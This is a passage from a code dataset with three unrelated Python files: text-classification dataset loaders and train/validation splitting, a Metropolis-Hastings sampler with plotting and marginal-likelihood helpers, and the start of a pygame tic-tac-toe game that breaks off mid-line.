open(test_text_path, encoding='utf-8') as f:\n texts = f.read()\n result = [text for text in texts.split('\\n')]\n result = result[:-1]\n test_texts = [element.strip() for element in result]\n \n test_label_path = os.path.join(sst2_data_path, 'sst2_test_labels.txt')\n with open(test_label_path, encoding='utf-8') as f:\n labels = f.read()\n result = [label for label in labels.split('\\n')]\n result = result[:-1]\n test_labels = [int(element) for element in result]\n\n # Shuffle training data and labels\n random.seed(seed)\n random.shuffle(train_texts)\n random.seed(seed)\n random.shuffle(train_labels)\n\n return ((train_texts, np.array(train_labels)),\n (test_texts, np.array(test_labels)))\n\ndef load_sst5_dataset(data_path, seed=123):\n sst5_data_path = os.path.join(data_path, 'SST-5')\n\n # Load training data -> unlabeled will come from here\n train_texts = []\n train_labels = []\n train_path = os.path.join(sst5_data_path, 'sst_train.txt')\n with open(train_path, encoding='utf-8') as f:\n texts = f.read()\n result = [text.split('\\t') for text in texts.split('\\n')]\n result = result[0:-1]\n train_texts = [element[1].strip() for element in result]\n train_labels = [int(element[0][-1])-1 for element in result]\n\n # Load validation/dev data -> unlabeled will come from here\n validation_texts = []\n validation_labels = []\n validation_path = os.path.join(sst5_data_path, 'sst_dev.txt')\n with open(validation_path, encoding='utf-8') as f:\n texts = f.read()\n result = [text.split('\\t') for text in texts.split('\\n')]\n result = result[0:-1]\n validation_texts = [element[1].strip() for element in result]\n validation_labels = [int(element[0][-1])-1 for element in result]\n\n # Load test data\n test_texts = []\n test_labels = []\n test_path = os.path.join(sst5_data_path, 'sst_test.txt')\n with open(test_path, encoding='utf-8') as f:\n texts = f.read()\n result = [text.split('\\t') for text in texts.split('\\n')]\n result = result[0:-1]\n test_texts = [element[1].strip() for element in result]\n test_labels = [int(element[0][-1])-1 for element in result]\n\n # Shuffle training data and labels\n random.seed(seed)\n random.shuffle(train_texts)\n random.seed(seed)\n random.shuffle(train_labels)\n\n # Combine train and validation\n train_texts.extend(validation_texts)\n train_labels.extend(validation_labels)\n\n return ((train_texts, np.array(train_labels)),\n (test_texts, np.array(test_labels)))\n\ndef load_amazon_elec_dataset(data_path, seed=123):\n amazon_elec_data_path = os.path.join(data_path, 'Electronics_5.json')\n\n texts = []\n labels = []\n with open(amazon_elec_data_path, encoding='utf-8') as f:\n data = f.read()\n result = data.split('\\n')\n for i in range(len(result)-1):\n entry = json.loads(result[i])\n if 'reviewText' in entry:\n texts.append(entry['reviewText'])\n labels.append(int(entry['overall'])-1)\n \n # Shuffle training data and labels\n random.seed(seed)\n random.shuffle(texts)\n random.seed(seed)\n random.shuffle(labels)\n\n return ((texts, np.array(labels)),)\n\ndef load_amazon_elec_binary_dataset(data_path, seed=123):\n amazon_elec_data_path = os.path.join(data_path, 'Electronics_5.json')\n\n texts = []\n labels = []\n with open(amazon_elec_data_path, encoding='utf-8') as f:\n data = f.read()\n result = data.split('\\n')\n for i in range(len(result)-1):\n entry = json.loads(result[i])\n if 'reviewText' in entry:\n # original labels from 1 to 5 -> 1 and 2 become negative label, 4 and 5 become positive label, 3 thrown out\n if int(entry['overall']) in (1, 2):\n texts.append(entry['reviewText'])\n labels.append(0)\n elif int(entry['overall']) in (4, 5):\n texts.append(entry['reviewText'])\n labels.append(1) \n \n # Shuffle training data and labels\n random.seed(seed)\n random.shuffle(texts)\n random.seed(seed)\n random.shuffle(labels)\n\n return ((texts, np.array(labels)),)\n\ndef load_modified_amazon_elec_binary_dataset(data_path, seed=123):\n amazon_elec_data_path = os.path.join(data_path, 'elec-unlab')\n\n # Load training data\n train_texts = [] \n train_labels = []\n train_texts_file = 'elec-25k-train.txt'\n train_labels_file = 'elec-25k-train.cat' # labels are 1 and 2\n with open(os.path.join(amazon_elec_data_path, train_texts_file), encoding='utf-8') as f:\n train_texts = [element.strip() for element in f.read().split('\\n')]\n train_texts = train_texts[:-1]\n with open(os.path.join(amazon_elec_data_path, train_labels_file), encoding='utf-8') as f:\n labels = [element for element in f.read().split('\\n')]\n labels = labels[:-1]\n train_labels = [int(element) - 1 for element in labels]\n\n # Load unlabeled data\n unlabeled_texts = [] \n unlabeled_labels = []\n unlabeled_texts_files = ['elec-25k-unlab00.txt', 'elec-25k-unlab01.txt']\n for file in unlabeled_texts_files:\n with open(os.path.join(amazon_elec_data_path, file), encoding='utf-8') as f:\n texts = [element.strip() for element in f.read().split('\\n')]\n texts = texts[:-1]\n unlabeled_texts.extend(texts)\n unlabeled_labels = [-1 for _ in range(len(unlabeled_texts))]\n\n # Load test data\n test_texts = [] \n test_labels = []\n test_texts_file = 'elec-test.txt'\n test_labels_file = 'elec-test.cat' # labels are 1 and 2\n with open(os.path.join(amazon_elec_data_path, test_texts_file), encoding='utf-8') as f:\n test_texts = [element.strip() for element in f.read().split('\\n')]\n test_texts = test_texts[:-1]\n with open(os.path.join(amazon_elec_data_path, test_labels_file), encoding='utf-8') as f:\n labels = [element for element in f.read().split('\\n')]\n labels = labels[:-1]\n test_labels = [int(element) - 1 for element in labels]\n\n # Shuffle the training data and labels.\n random.seed(seed)\n random.shuffle(train_texts)\n random.seed(seed)\n random.shuffle(train_labels)\n\n return ((train_texts, np.array(train_labels)),\n (unlabeled_texts, np.array(unlabeled_labels)),\n (test_texts, np.array(test_labels)))\n\ndef load_dbpedia_dataset(data_path, seed=123):\n dbpedia_data_path = os.path.join(data_path, 'dbpedia_csv')\n\n # Load train data\n train_texts = []\n train_labels = []\n train_path = os.path.join(dbpedia_data_path, 'train.csv')\n train_data = pd.read_csv(train_path, header=None)\n train_data.columns = ['class', 'title', 'content']\n train_texts = train_data['content'].tolist()\n train_labels = train_data['class'].tolist()\n train_labels = [element - 1 for element in train_labels]\n\n # Load test data\n test_texts = []\n test_labels = []\n test_path = os.path.join(dbpedia_data_path, 'test.csv')\n test_data = pd.read_csv(test_path, header=None)\n test_data.columns = ['class', 'title', 'content']\n test_texts = test_data['content'].tolist()\n test_labels = test_data['class'].tolist()\n test_labels = [element - 1 for element in test_labels]\n\n # Shuffle training data and labels\n random.seed(seed)\n random.shuffle(train_texts)\n random.seed(seed)\n random.shuffle(train_labels)\n\n return ((train_texts, np.array(train_labels)),\n (test_texts, np.array(test_labels)))\n\ndef load_ag_news_dataset(data_path, seed=123):\n ag_news_data_path = os.path.join(data_path, 'ag_news_csv')\n\n # Load train data\n train_texts = []\n train_labels = []\n train_path = os.path.join(ag_news_data_path, 'train.csv')\n train_data = pd.read_csv(train_path, header=None)\n train_data.columns = ['class', 'title', 'content']\n train_texts = train_data['content'].tolist()\n train_labels = train_data['class'].tolist()\n train_labels = [element - 1 for element in train_labels]\n\n # Load test data\n test_texts = []\n test_labels = []\n test_path = os.path.join(ag_news_data_path, 'test.csv')\n test_data = pd.read_csv(test_path, header=None)\n test_data.columns = ['class', 'title', 'content']\n test_texts = test_data['content'].tolist()\n test_labels = test_data['class'].tolist()\n test_labels = [element - 1 for element in test_labels]\n\n # Shuffle training data and labels\n random.seed(seed)\n random.shuffle(train_texts)\n random.seed(seed)\n random.shuffle(train_labels)\n\n return ((train_texts, np.array(train_labels)),\n (test_texts, np.array(test_labels)))\n\ndef load_yelp_full_dataset(data_path, seed=123):\n yelp_data_path = os.path.join(data_path, 'yelp_review_full_csv')\n\n # Load train data\n train_texts = []\n train_labels = []\n train_path = os.path.join(yelp_data_path, 'train.csv')\n train_data = pd.read_csv(train_path, header=None)\n train_data.columns = ['class', 'text']\n train_texts = train_data['text'].tolist()\n train_labels = train_data['class'].tolist()\n train_labels = [element - 1 for element in train_labels]\n\n # Load test data\n test_texts = []\n test_labels = []\n test_path = os.path.join(yelp_data_path, 'test.csv')\n test_data = pd.read_csv(test_path, header=None)\n test_data.columns = ['class', 'text']\n test_texts = test_data['text'].tolist()\n test_labels = test_data['class'].tolist()\n test_labels = [element - 1 for element in test_labels]\n\n # Shuffle training data and labels\n random.seed(seed)\n random.shuffle(train_texts)\n random.seed(seed)\n random.shuffle(train_labels)\n\n return ((train_texts, np.array(train_labels)),\n (test_texts, np.array(test_labels)))\n\ndef load_yelp_polarity_dataset(data_path, seed=123):\n yelp_data_path = os.path.join(data_path, 'yelp_review_polarity_csv')\n\n # Load train data\n train_texts = []\n train_labels = []\n train_path = os.path.join(yelp_data_path, 'train.csv')\n train_data = pd.read_csv(train_path, header=None)\n train_data.columns = ['class', 'text']\n train_texts = train_data['text'].tolist()\n train_labels = train_data['class'].tolist()\n train_labels = [element - 1 for element in train_labels]\n\n # Load test data\n test_texts = []\n test_labels = []\n test_path = os.path.join(yelp_data_path, 'test.csv')\n test_data = pd.read_csv(test_path, header=None)\n test_data.columns = ['class', 'text']\n test_texts = test_data['text'].tolist()\n test_labels = test_data['class'].tolist()\n test_labels = [element - 1 for element in test_labels]\n\n # Shuffle training data and labels\n random.seed(seed)\n random.shuffle(train_texts)\n random.seed(seed)\n random.shuffle(train_labels)\n\n return ((train_texts, np.array(train_labels)),\n (test_texts, np.array(test_labels)))\n\ndef load_amazon_full_dataset(data_path, seed=123):\n amazon_data_path = os.path.join(data_path, 'amazon_review_full_csv')\n\n # Load train data\n train_texts = []\n train_labels = []\n train_path = os.path.join(amazon_data_path, 'train.csv')\n train_data = pd.read_csv(train_path, header=None)\n train_data.columns = ['class', 'title', 'text']\n train_texts = train_data['text'].tolist()\n train_labels = train_data['class'].tolist()\n train_labels = [element - 1 for element in train_labels]\n\n # Load test data\n test_texts = []\n test_labels = []\n test_path = os.path.join(amazon_data_path, 'test.csv')\n test_data = pd.read_csv(test_path, header=None)\n test_data.columns = ['class', 'title', 'text']\n test_texts = test_data['text'].tolist()\n test_labels = test_data['class'].tolist()\n test_labels = [element - 1 for element in test_labels]\n\n # Shuffle training data and labels\n random.seed(seed)\n random.shuffle(train_texts)\n random.seed(seed)\n random.shuffle(train_labels)\n\n return ((train_texts, np.array(train_labels)),\n (test_texts, np.array(test_labels)))\n\ndef load_amazon_polarity_dataset(data_path, seed=123):\n amazon_data_path = os.path.join(data_path, 'amazon_review_polarity_csv')\n\n # Load train data\n train_texts = []\n train_labels = []\n train_path = os.path.join(amazon_data_path, 'train.csv')\n train_data = pd.read_csv(train_path, header=None)\n train_data.columns = ['class', 'title', 'text']\n train_texts = train_data['text'].tolist()\n train_labels = train_data['class'].tolist()\n train_labels = [element - 1 for element in train_labels]\n\n # Load test data\n test_texts = []\n test_labels = []\n test_path = os.path.join(amazon_data_path, 'test.csv')\n test_data = pd.read_csv(test_path, header=None)\n test_data.columns = ['class', 'title', 'text']\n test_texts = test_data['text'].tolist()\n test_labels = test_data['class'].tolist()\n test_labels = [element - 1 for element in test_labels]\n\n # Shuffle training data and labels\n random.seed(seed)\n random.shuffle(train_texts)\n random.seed(seed)\n random.shuffle(train_labels)\n\n return ((train_texts, np.array(train_labels)),\n (test_texts, np.array(test_labels)))\n\ndef load_yahoo_answers_dataset(data_path, seed=123):\n yahoo_answers_data_path = os.path.join(data_path, 'yahoo_answers_csv')\n\n # Load train data\n train_texts = []\n train_labels = []\n train_path = os.path.join(yahoo_answers_data_path, 'train.csv')\n train_data = pd.read_csv(train_path, header=None)\n train_data.columns = ['class', 'title', 'content', 'answer']\n train_data = train_data[['class', 'answer']]\n train_data = train_data.dropna()\n train_texts = train_data['answer'].tolist()\n train_labels = train_data['class'].tolist()\n train_labels = [element - 1 for element in train_labels]\n\n # Load test data\n test_texts = []\n test_labels = []\n test_path = os.path.join(yahoo_answers_data_path, 'test.csv')\n test_data = pd.read_csv(test_path, header=None)\n test_data.columns = ['class', 'title', 'content', 'answer']\n test_data = test_data[['class', 'answer']]\n test_data = test_data.dropna()\n test_texts = test_data['answer'].tolist()\n test_labels = test_data['class'].tolist()\n test_labels = [element - 1 for element in test_labels]\n\n # Shuffle training data and labels\n random.seed(seed)\n random.shuffle(train_texts)\n random.seed(seed)\n random.shuffle(train_labels)\n\n return ((train_texts, np.array(train_labels)),\n (test_texts, np.array(test_labels)))\n\ndef load_twenty_news_dataset(data_path, seed=123):\n twenty_news_data_path = os.path.join(data_path, '20news-18828')\n\n texts = []\n labels = []\n label_index = 0\n\n for folder_name in sorted(os.listdir(twenty_news_data_path)):\n label_index += 1\n path = os.path.join(twenty_news_data_path, folder_name)\n for filename in sorted(os.listdir(path)):\n with open(os.path.join(path, filename), 'rb') as f:\n text = f.read().decode('utf-8', 'ignore')\n texts.append(text)\n labels.append(label_index)\n\n # Shuffle training data and labels\n random.seed(seed)\n random.shuffle(texts)\n random.seed(seed)\n random.shuffle(labels)\n\n return ((texts, np.array(labels)),)\n\ndef load_airport_tweets_dataset(data_path, seed=123):\n airport_tweets_data_path = os.path.join(data_path, 'Tweets.csv')\n\n texts = []\n labels = []\n data = pd.read_csv(airport_tweets_data_path)\n texts = data['text'][data['airline_sentiment'] != 'neutral'].tolist()\n labels = data['airline_sentiment'][data['airline_sentiment'] != 'neutral'].tolist()\n labels = [1 if element == 'positive' else 0 for element in labels]\n\n # Shuffle training data and labels\n random.seed(seed)\n random.shuffle(texts)\n random.seed(seed)\n random.shuffle(labels)\n\n return ((texts, np.array(labels)),)\n\nclass TextDataset(Dataset):\n def __init__(self, txt, labels):\n self.labels = labels\n self.text = txt\n def __len__(self):\n return len(self.labels)\n def __getitem__(self, idx):\n label = self.labels[idx]\n text = self.text[idx]\n sample = {\"Text\": text, \"Class\": label}\n return sample\n def get_labels(self):\n return self.labels\n def get_text(self):\n return self.text\n\ndef create_dataset(text, labels, slice_start=None, slice_end=None):\n '''\n Create instance of TextDataset given a dataset\n '''\n if slice_start is None:\n slice_start = 0\n if slice_end is None:\n slice_end = len(text)\n return TextDataset(text[slice_start:slice_end], labels[slice_start:slice_end])\n\ndef split_datasets(train, \n labeled_proportion, \n validation_proportion=None, \n test=None, \n unlabeled=None, \n balance_classes=False, \n no_calibration=False):\n '''\n Takes as input three tuples - (train_text, train_labels), (test_text, test_labels), (unlabeled_text, unlabeled_labels)\n Outputs (train_text, train_labels), (validation_text, validation_labels), (test_text, test_labels), (unlabeled_text, unlabeled_labels)\n Test is unchanged\n Validation comes from input train (size = validation_proportion * size of input train)\n Train is a subset of input train (size = labeled_proportion * size of input train)\n Remaining unused samples from input train added to unlabeled set\n labeled_proportion + validation_proportion must be <= 1\n '''\n if no_calibration is False:\n if labeled_proportion + validation_proportion > 1:\n raise Exception('labeled_proportion and validation_proportion cannot sum to more than 1')\n else:\n if labeled_proportion > 1:\n raise Exception('labeled_proportion cannot be greater than 1')\n\n original_train_length = len(train[1])\n\n if balance_classes: # create train set with equal number of samples for each class\n unique_classes = np.sort(np.unique(np.array(train[1])))\n\n train_labels = np.array(train[1])\n train_texts = np.array(train[0])\n idx = np.argsort(train_labels)\n\n train_labels = list(np.array(train_labels)[idx])\n train_texts = list(np.array(train_texts)[idx])\n\n new_train_size = int(labeled_proportion * len(train[1]))\n num_per_class = int(1.0 * new_train_size / len(unique_classes)) # rounds down\n\n idx_for_each_class = []\n for class_label in unique_classes:\n class_idx = train_labels.index(class_label)\n idx_for_each_class.append(class_idx)\n idx_for_each_class.append(len(train_labels))\n \n new_train_texts = []\n new_train_labels = []\n old_train_texts = []\n old_train_labels = []\n\n for i in range(len(idx_for_each_class)-1):\n index = idx_for_each_class[i]\n next_index = idx_for_each_class[i+1]\n\n new_train_texts.extend(train_texts[index:index+num_per_class])\n new_train_labels.extend(train_labels[index:index+num_per_class])\n old_train_texts.extend(train_texts[index+num_per_class:next_index])\n old_train_labels.extend(train_labels[index+num_per_class:next_index])\n\n\n # shuffle\n random.seed(123)\n zipped_new_train = list(zip(new_train_texts, new_train_labels))\n random.shuffle(zipped_new_train)\n new_train_texts, new_train_labels = zip(*zipped_new_train)\n\n zipped_old_train = list(zip(old_train_texts, old_train_labels))\n random.shuffle(zipped_old_train)\n old_train_texts, old_train_labels = zip(*zipped_old_train)\n\n new_train = list(new_train_texts), list(new_train_labels) \n old_train = list(old_train_texts), list(old_train_labels)\n else:\n new_train_size = int(labeled_proportion * len(train[1]))\n new_train = train[0][:new_train_size], train[1][:new_train_size]\n old_train = train[0][new_train_size:], train[1][new_train_size:]\n\n if test is None:\n # make test set 20% of original train\n new_test_size = int(0.2 * original_train_length)\n test = old_train[0][:new_test_size], old_train[1][:new_test_size]\n old_train = old_train[0][new_test_size:], old_train[1][new_test_size:]\n\n if no_calibration is False:\n validation_size = int(validation_proportion * original_train_length)\n validation = old_train[0][:validation_size], old_train[1][:validation_size]\n old_train = old_train[0][validation_size:], old_train[1][validation_size:]\n else:\n validation = None\n\n if unlabeled is None:\n new_unlabeled_text = np.array(old_train[0])\n else:\n new_unlabeled_text = np.concatenate((unlabeled[0], old_train[0]), axis=0)\n new_unlabeled_labels = np.full((new_unlabeled_text.shape[0], 1), -1)\n new_unlabeled = (new_unlabeled_text, new_unlabeled_labels)\n return new_train, validation, test, new_unlabeled\n\ndef dataset_metrics(dataset):\n '''\n Assumes dataset is tuple with (text, labels)\n '''\n text, labels = dataset\n num_samples = len(labels)\n\n num_classes = len(np.unique(labels))\n\n # label distribution (# samples / class)\n (unique_label, counts_label) = np.unique(labels, return_counts=True)\n label_distribution = np.asarray((unique_label, counts_label)).T # class number to # samples in that class\n\n # number of words per sample\n num_words_per_sample = [len(element.split(' ')) for element in text]\n average_words_per_sample = np.average(num_words_per_sample)\n\n (unique_word, counts_word) = np.unique(num_words_per_sample, return_counts=True)\n word_distribution = np.asarray((unique_word, counts_word)).T # num words to num samples with that many words\n\n return num_samples, num_classes, label_distribution, average_words_per_sample, word_distribution\n\ndef get_dataset_from_dataloader(dataloader, device):\n texts = []\n labels = []\n\n with torch.no_grad():\n for (_, batch) in enumerate(dataloader):\n inputs, outputs = batch['Text'].to(device), batch['Class'].to(device)\n\n texts.append(inputs)\n labels.extend(outputs.cpu().numpy())\n \n texts = torch.cat(texts).cpu().numpy()\n \n return texts, labels\n","repo_name":"emmaliu8/selftraining_calibration","sub_path":"data_setup.py","file_name":"data_setup.py","file_ext":"py","file_size_in_byte":25661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21734394588","text":"import numpy as np\nfrom . import dist\n\n\ndef sse(y, pred):\n \"\"\"\n SumSquaredError\n\n Parameters\n ----------\n\n y : array-like\n Data\n pred : array-like\n Prediction\n\n Returns\n -------\n array\n\n\n \"\"\"\n return np.sum((y - pred)**2)\n\n\ndef mh_example(do_plot=True, verbose=False):\n \"\"\"\n Example use of MH for nonlinear fitting\n\n Model:\n Generative likelihood\n Y = a*exp(-b*X) + N(0,sig^2)\n Priors:\n a ~ N(0,1)\n b ~ Gamma(1,1)\n\n Where:\n X: array of regressors\n a,b: parameters\n\n\n Returns\n -------\n array (nsamples x nparams)\n\n \"\"\"\n np.random.seed(123)\n\n x = np.linspace(0, 10, 100)\n p = [1, 2, 0.05]\n y = p[0] * np.exp(-p[1] * x)\n y_noise = y + p[2] * np.random.randn(y.size)\n\n # model\n # a ~ N(0,10^2)\n # b ~ N(0,10^2)\n # sig ~ Gamma(1,1)\n # y ~ a*exp(-b*x) + N(0,sig^2)\n\n # loglik\n def forward(p):\n return p[0] * np.exp(-p[1] * x)\n\n def loglik(p):\n pred = forward(p)\n return sse(y_noise, pred) / 2 / p[2]**2\n\n # logpr\n def logpr(p):\n pr = dist.gauss_logpdf(p[0], loc=0, scale=10)\n pr += dist.gauss_logpdf(p[1], loc=0, scale=10)\n pr += dist.gamma_logpdf(p[2], shape=1, scale=1)\n return pr\n\n p0 = [1, 1, 0.05]\n mask = [1, 1, 0]\n LB = [-np.inf, 0.0001, 0.0001]\n UB = [np.inf, np.inf, np.inf]\n mh = MH(loglik, logpr)\n samples = mh.fit(p0, mask=mask, verbose=verbose, LB=LB, UB=UB)\n\n if do_plot:\n mh.plot_samples(samples, labels=['a', 'b', 'sig'])\n mh.plot_fit(forward, x, y_noise, samples.mean(axis=0))\n\n return samples\n\n\ndef test_mh_example():\n samples = mh_example(do_plot=False)\n assert 0 < samples.mean(axis=0)[0] < 2\n assert 0 < samples.mean(axis=0)[1] < 3\n\n\ndef plot_samples(samples, labels=None, plot_type='matrix'):\n \"\"\"\n Plot summary of the sampling\n\n samples : array-like (num_samples x num_params)\n labels : list\n plot_type : one of: 'matrix', 'vector', 'corr'\n \"\"\"\n\n import seaborn as sns\n import pandas as pd\n import matplotlib.pyplot as plt\n\n plt.figure()\n sns.set()\n\n if plot_type == 'matrix':\n df = pd.DataFrame(data=samples, columns=labels)\n g = sns.PairGrid(df)\n g.map_diag(plt.hist)\n g.map_offdiag(sns.kdeplot)\n elif plot_type == 'vector':\n mean = np.mean(samples, axis=0)\n\n std_pos = np.sqrt(np.sum(np.maximum(0, samples - mean)**2, axis=0) / np.sum((samples - mean) > 0, axis=0))\n std_neg = np.sqrt(np.sum(np.maximum(0, mean - samples)**2, axis=0) / np.sum((mean - samples) > 0, axis=0))\n\n fig, ax = plt.subplots(1)\n plt.errorbar(y=range(samples.shape[1]),\n x=mean,\n xerr=[std_neg, std_pos], fmt='o')\n if labels is not None:\n ax.set_yticks(range(len(labels)))\n ax.set_yticklabels(labels=labels)\n elif plot_type == 'corr':\n df = pd.DataFrame(data=samples, columns=labels)\n corr = df.corr()\n # Generate a mask for the upper triangle\n mask = np.zeros_like(corr, dtype=np.bool)\n mask[np.triu_indices_from(mask)] = True\n # Set up the matplotlib figure\n f, ax = plt.subplots(figsize=(11, 9))\n # Generate a custom diverging colormap\n cmap = sns.diverging_palette(220, 10, as_cmap=True)\n # Draw the heatmap with the mask and correct aspect ratio\n sns.heatmap(corr, mask=mask, cmap=cmap, center=0, annot=True,\n square=True, linewidths=.5, cbar_kws={\"shrink\": .5}, annot_kws={\"size\": 8}, fmt='.1g')\n\n else:\n raise Exception('Unknown plot_type')\n\n\ndef plot_fit(forward, x, y, params):\n \"\"\"\n Plot data fit\n\n forward : function\n data : array\n params : array\n \"\"\"\n import seaborn as sns\n import matplotlib.pyplot as plt\n\n sns.set()\n plt.figure()\n sns.scatterplot(x, y)\n sns.lineplot(x, forward(params))\n\n\nclass MH:\n\n def __init__(self, loglik, logpr, burnin=1000, sampleevery=10, njumps=5000, update=20):\n \"\"\"\n Initialise MH object\n\n Parameters\n ----------\n\n loglik: function\n Maps parameters to minus log-likelihood\n logpr: function\n Maps parameters to minus log-prior\n burnin: int\n Number of iterations before actual sampling starts\n sampleevery: int\n Sampling rate\n njumps: int\n Number of sampling iterations\n update: int\n Rate of update of proposal distribution\n\n\n \"\"\"\n\n self.burnin = burnin\n self.sampleevery = sampleevery\n self.njumps = njumps\n self.update = update\n self.loglik = loglik\n self.logpr = logpr\n\n def bounds_from_list(self, n, bounds):\n \"\"\"\n Get bounds from list to two lists\n Args:\n n: num params\n bounds: sciipy-optimize-style bounds\n\n Returns:\n numpy 1D array (Lower bounds)\n numpy 1D array (Upper bounds)\n \"\"\"\n LB = -np.inf * np.ones(n)\n UB = np.inf * np.ones(n)\n if bounds is None:\n return LB, UB\n if not isinstance(bounds, list):\n raise(Exception('bounds must either be a list or None'))\n for i, b in enumerate(bounds):\n LB[i] = b[0] if b[0] is not None else -np.inf\n UB[i] = b[1] if b[1] is not None else np.inf\n return LB, UB\n\n def fit(self, p0, mask=None, verbose=False, LB=None, UB=None):\n \"\"\"\n Run Metropolis Hastings algorithm to fit data\n\n Parameters\n ----------\n\n p0 : array-like\n Initial values for the parameters to be fitted\n mask : array-like\n Mask for fixed parameters. Has the same size as p0, contains zero for fixed parameters\n verbose : boolean\n LB: array-like\n Lower bounds on parameters\n UB array-like\n Upper bounds on parameters\n\n Returns\n -------\n array\n Samples from the posterior distribution (nsamples X nparams)\n\n \"\"\"\n # Convert to numpy array\n p0 = np.array(p0, dtype=float)\n\n if verbose:\n print(\"Initialisation\")\n\n # Bounds\n LB = np.full(p0.size, -np.inf) if LB is None else LB\n UB = np.full(p0.size, np.inf) if UB is None else UB\n\n for idx in range(p0.size):\n if not LB[idx] <= p0[idx] <= UB[idx]:\n raise Exception(\"Initial values outside of range!!!\")\n\n # Initialise p,e,acc,rej,prop\n p = np.array(p0, dtype=float)\n e = self.loglik(p) + self.logpr(p)\n acc = np.zeros(p.size)\n rej = np.zeros(p.size)\n prop = np.abs(p0) / 10 # np.ones(p.size)\n prop[prop == 0] = 1\n\n samples = np.zeros((self.njumps + self.burnin, p.size))\n\n # Mask\n if mask is None:\n mask = np.ones(p0.size)\n\n # Main loop\n maxiter = self.burnin + self.njumps\n if verbose:\n print(\"Begin MH sampling\")\n for iter in range(maxiter):\n if verbose:\n print(\".... Iter {}/{}\".format(iter, maxiter))\n # Loop through params\n for idx in range(p.size):\n if mask[idx] != 0:\n oldp = p[idx]\n p[idx] = p[idx] + np.random.randn() * prop[idx]\n if not LB[idx] <= p[idx] <= UB[idx]:\n p[idx] = oldp\n rej[idx] += 1\n else:\n olde = e\n e = self.loglik(p) + self.logpr(p)\n if np.exp(olde - e) > np.random.rand():\n acc[idx] += 1\n else:\n p[idx] = oldp\n rej[idx] += 1\n e = olde\n # end loop over params\n samples[iter, :] = p\n if iter % self.update == 0:\n if verbose:\n print(\".... >>> Update Proposal \")\n prop *= np.sqrt((1 + acc) / (1 + rej))\n acc *= 0\n rej *= 0\n\n samples = samples[self.burnin::self.sampleevery]\n return samples\n\n def marglik_HM(self, samples):\n \"\"\"\n Approximate Marginal Likelihood using Harmonic Mean estimator\n\n Parameters\n ----------\n samples : array-like\n \"\"\"\n LL = np.zeros(samples.shape[0])\n for i in range(samples.shape[0]):\n LL[i] = self.loglik(samples[i, :])\n\n M = LL.max()\n ML = np.log(1 / np.sum(np.exp(LL - M))) - M - np.log(samples.shape[0])\n\n return ML\n\n def marglik_Laplace(self, samples):\n \"\"\"\n Approximate Marginal Likelihood using Laplace approx\n\n Parameters\n ----------\n samples : array-like\n \"\"\"\n mean = samples.mean(axis=0)\n detcov = np.linalg.det(np.cov(samples.T))\n\n LL = -self.loglik(mean)\n LP = -self.logpr(mean)\n\n ML = LL + LP + .5 * np.log(detcov) + samples.shape[1] / 2.0 * np.log(np.pi)\n\n return ML\n","repo_name":"wtclarke/fsl_mrs","sub_path":"fsl_mrs/utils/stats/mh.py","file_name":"mh.py","file_ext":"py","file_size_in_byte":9208,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"22667531316","text":"# Pygame template for new games\n\nimport pygame as pg\nimport random\nfrom os import path\n\n#Pygame settings\nWIDTH = 480\nHEIGHT = 600\nFPS = 60\n\n\nSPRITESHEET = \"\"\n\n#Layers\n\n#Colors\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nTRANSGRAY = (200, 200, 200, 128)\n\n\nRED = (255, 0, 0)\nDARK_RED = (200, 0, 0)\n\nYELLOW = (255, 255, 0)\nDARK_YELLOW = (200, 200, 0)\n\nGREEN = (0, 255, 0)\nDARK_GREEN = (0, 200, 0)\n\nBLUE = (0, 0, 255)\nCYAN = (0, 255, 255)\nPURPLE = (255, 0, 255)\nDARKPURPLE = (51, 0, 51)\nBLUEGREEN = (162, 247, 225)\nBROWN = (51, 25, 0)\nGRAY = (128, 128, 128)\nLT_GRAY = (211, 211, 211)\n\nBG_COLOR = BLUEGREEN\n\nclass Game:\n\n def __init__(self):\n # initializes game window\n pg.init() # starts the game\n pg.mixer.init() # used for sound and music\n self.screen = pg.display.set_mode((WIDTH, HEIGHT))\n pg.display.set_caption(\"TicTacToe vs AI\")\n self.clock = pg.time.Clock()\n self.running = True\n self.load_data()\n\n def load_data(self):\n self.dir = path.dirname(__file__)\n img_dir = path.join(self.dir, 'img')\n self.font_name = path.join(img_dir, 'Soft Marshmallow.otf')\n\n def new(self):\n self.bWIDTH = 100\n self.bHEIGHT = 100\n\n self.screen.fill(WHITE)\n #pg.draw.rect(self.screen, RED, [87, 148, 310, 310])\n\n pg.draw.line(self.screen, BLACK, (189, HEIGHT / 2 - 152), (189, HEIGHT / 2 + 157), 5)\n pg.draw.line(self.screen, BLACK, (294, HEIGHT / 2 - 152), (294, HEIGHT / 2 + 157), 5)\n\n pg.draw.line(self.screen, BLACK, (WIDTH / 2 - 153, 250), (WIDTH / 2 + 157, 250), 5)\n pg.draw.line(self.screen, BLACK, (WIDTH / 2 - 153, 355), (WIDTH / 2 + 157, 355), 5)\n\n pg.draw.rect(self.screen, WHITE, [87, 148, self.bWIDTH, self.bHEIGHT])\n pg.draw.rect(self.screen, WHITE, [87, 253, self.bWIDTH, self.bHEIGHT])\n pg.draw.rect(self.screen, WHITE, [87, 358, self.bWIDTH, self.bHEIGHT])\n pg.draw.rect(self.screen, WHITE, [192, 148, self.bWIDTH, self.bHEIGHT])\n pg.draw.rect(self.screen, WHITE, [192, 253, self.bWIDTH, self.bHEIGHT])\n pg.draw.rect(self.screen, WHITE, [192, 358, self.bWIDTH, self.bHEIGHT])\n pg.draw.rect(self.screen, WHITE, [297, 148, self.bWIDTH, self.bHEIGHT])\n pg.draw.rect(self.screen, WHITE, [297, 253, self.bWIDTH, self.bHEIGHT])\n pg.draw.rect(self.screen, WHITE, [297, 358, self.bWIDTH, self.bHEIGHT])\n\n\n pg.display.flip()\n self.run()\n\n def run(self):\n self.playing = True\n self.player_turn = True\n while self.playing:\n self.clock.tick(FPS)\n self.events()\n\n def update(self):\n pass\n\n def events(self):\n\n for event in pg.event.get():\n if event.type == pg.QUIT:\n if self.playing:\n self.playing = False\n self.running = False\n\n if self.player_turn == True:\n self.button(\"\", 87, 148, 100, 100, WHITE, TRANSGRAY, 22, \"Place\")\n self.button(\"\", 87, 253, 100, 100, WHITE, TRANSGRAY, 22, \"Place\")\n self.button(\"\", 87, 358, 100, 100, WHITE, TRANSGRAY, 22, \"Place\")\n self.button(\"\", 192, 148, 100, 100, WHITE, TRANSGRAY, 22, \"Place\")\n self.button(\"\", 